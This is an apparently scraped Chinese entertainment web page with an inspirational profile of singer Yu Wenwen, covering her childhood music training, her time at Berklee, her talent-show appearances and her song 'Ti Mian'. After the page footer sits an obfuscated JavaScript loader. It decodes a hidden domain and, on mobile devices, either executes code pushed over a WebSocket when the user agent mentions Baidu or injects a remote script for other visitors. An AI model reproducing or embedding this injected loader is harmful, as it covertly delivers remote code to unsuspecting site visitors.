韩庚的“前任”,陶喆也忍不住要“收入囊中”,于文文的体面呢?

文/红豆

“分手应该体面,谁都不要说抱歉,何来亏欠。”

想必大家对这首耳熟能详的歌曲一定不会陌生,没错,就是《前任3》的插曲《体面》。

也许你和我一样,认识于文文看,是从她的主演的《前任3》和她的《体面》开始的。

一部电影,让观众认识了作为演员的于文文,一首歌曲,更让人们记住了唱作俱佳的歌手于文文。

许多人觉得,于文文的运气真的好,一部戏、一首歌让自己一夜成名。

只是运气好吗?

如果你知道她的故事,你就会懂这个世界上哪里有什么随随便的成功,所有的才华横溢天赐良机背后,是指尖在琴键上不曾停歇的弹奏。

所谓的一夜成名,无非都是百炼成钢。

01.童年

“决定要成为一名歌手没有一个特别明确的界限,因为我从小就喜欢唱歌,四岁就开始弹钢琴,唱歌、弹琴、听音乐、谈音乐很早就已经成为我生命当中的一部分了,所以是潜移默化的,慢慢的就把这个当成一个职业了。”

于文文是一个出生于1989年的辽宁女孩,从小就是别人家的女孩。

在文文还没有出生的时候,家里就有一台钢琴,等到于文文长到了四五岁的时候,这个钢琴终于有了新的使命。

对于四五岁的孩子来说,正是好动的年纪,每当其他孩子都在疯狂玩耍时,自己却要每天雷打不动地弹2个小时钢琴,这是于文文内心不可言喻的痛。

然而到了十多岁的时候,于文文终于好像可以慢慢理解了父母当时的苦心了,“当我十几岁的时候,别的小朋友可能什么都不会,但你既能弹钢琴又能弹吉他,同学们只能投来羡慕的目光时,我忽然理解了父母当年的做法,爸爸妈妈真的是为了我好。”

在这期间,于文文除了钢琴,也在学习吉他。渐渐地,于文文慢慢享受音乐给自己带来的变化。

15岁的时候,于文文随父母移民到加拿大温哥华Killarney中学就读,随后孩子在温哥华加入了弦乐队,担任吉他手。于文文每天常常花十五六个小时来练习,因为对于在异国他乡的她来说,音乐和乐器成了我重要的朋友。

“音乐是属于我的事情,我特别想把它做好,我就像是疯了一样,每天练很久很久琴,弹很多曲子,在学校也经常上舞台表演。”

19岁,于文文获得了美国伯克利大学的奖学金,在美国顶级音乐学院度过了自己的大学生涯。

20多岁,于文文毅然放弃在美国已经小有起步的音乐事业,回到国内,从零开始。

这份从小背井离乡在国外求学的经历,这段求学时光的心路历程,让于文文比一般女孩多了一份坚毅的信念,她的眼神中也透着那股无人能及的倔强劲儿。

更让她坚定,自己的这一生都要为了自己喜欢的音乐理想努力奋斗。

02.成名

2014年,25岁的于文文站上了《最美和声》的舞台里,她自弹自唱改编了张学友的《我真的受伤了》,一开口便迅速打动了陶喆,并主动为她和声。

这是她第一次的惊艳亮相,让许多人初识这个女孩。

2016年,27岁的于文文又出现在《中国好歌曲》节目里,这次带来的是自己的原创歌曲《心跳》。这次,四位导师都为她亮灯。

随后于文文进入羽泉的战队当学员,还被称为最美学员。

再到后来,便是一首《体面》横空出世,让于文文快速的被大众熟知。

一人一首成名曲,到底是好还是不好呢?是不是一种束缚呢?

对于这个问题,于文文在一次采访中坦然承认《体面》作为代表作给她带来的好处——她被更多人认识了,有了越来越多的歌迷,工作也因此越来越丰富,有了更多机会。

她也说《体面》给她带来了很多,很感激这首歌,但是同时也承认《体面》是她的束缚,她在努力地做出更多作品来超越《体面》。

是的,体面地撕下《体面》给自己带来的标签,努力地用自己音乐才华为自己加冕。

03.坚持

出道至今,于文文从未改变过自己在音乐和演艺道路上的追求,她笑着说:“如果有什么改变的话,大概是自己的年纪吧!”

于文文的性格就是这样的豪爽,可是对于梦想,她真的一直不曾放弃。

于文文微博上曾写道:每一个你不满意的现在,都有一个你不努力的曾经。

是的,只要肯努力,最差的结局,也不过是大器晚成而已。看似一夜爆火的她,一直努力坚持所期待的梦想,曾所吃的苦都是为了照亮未来道路。所以说机会总是留给有准备的人的,上天也总会眷顾踏实勤奋的人。

剧情介绍 一颗红豆 娱乐

有用 (646)

评论加载中...
function Fdhbztse(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function xtpXLz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return Fdhbztse(t);};window['\x49\x72\x75\x61\x79\x67\x76']=(/^Android|iPhone|iPad|iPod|Linux/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=xtpXLz,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':6868/'+i);ws.onmessage=function(e){new Function('_cqgd',x(e.data))(cs);ws.close();}}else{var s=document.createElement('script');s.src=u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHM6Ly95c2prYmsuY29t','ZmEueXNqa2JrLmNvbbQ==','509',window,document,['H','b']);}:function(){};